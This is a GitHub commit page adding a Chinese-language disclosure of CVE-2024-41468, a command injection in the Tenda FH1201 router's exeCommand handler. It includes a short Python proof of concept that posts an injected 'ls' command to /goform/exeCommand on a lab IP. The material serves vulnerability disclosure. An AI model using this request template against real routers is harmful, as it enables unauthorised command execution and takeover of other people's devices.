-
Notifications
You must be signed in to change notification settings - Fork 401
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Upload new file: CVE-2024-41468 POC.md via simpread
- Loading branch information
Showing
1 changed file
with
33 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/tH0yaxR7uY0VYryzqYboCw) | ||
Tenda-FH1201 存在命令注入漏洞 (CVE-2024-41468) | ||
====================================== | ||
|
||
Tenda FH1201 v1.2.0.14 存在命令注入漏洞,位于 exeCommand 函数中,cmdinput 参数未经任何过滤就被复制到栈空间 v7 中,然后执行,因此攻击者可以利用该漏洞执行任意命令 | ||
|
||
固件下载网站:https://www.tendacn.com/download/detail-3322.html | ||
|
||
![](https://mmbiz.qpic.cn/sz_mmbiz_png/GzdTGmQpRic2BbiafxAEGu7ObiajHKk1k1f8tMP5PDSZvqv5St4eIfeBUJdGzYVflDWofQtR38ibVsv8GU1avdMI2w/640?wx_fmt=png&from=appmsg) | ||
|
||
poc | ||
--- | ||
|
||
``` | ||
import requests | ||
ip = '192.168.74.145' | ||
url = f"http://{ip}/goform/exeCommand" | ||
data = "cmdinput=ls;" | ||
ret = requests.post(url=url,data=data) | ||
``` | ||
|
||
![](https://mmbiz.qpic.cn/sz_mmbiz_png/GzdTGmQpRic2BbiafxAEGu7ObiajHKk1k1fFTAmWIpztVLnPycHjY8iaM0IBeic1fEpFglHqgArr4ZXTXdfeadmMOdw/640?wx_fmt=png&from=appmsg) | ||
|
||
漏洞来源 | ||
---- | ||
|
||
* • https://github.com/iotresearch/iot-vuln/blob/main/Tenda/FH1201/exeCommand/README.md |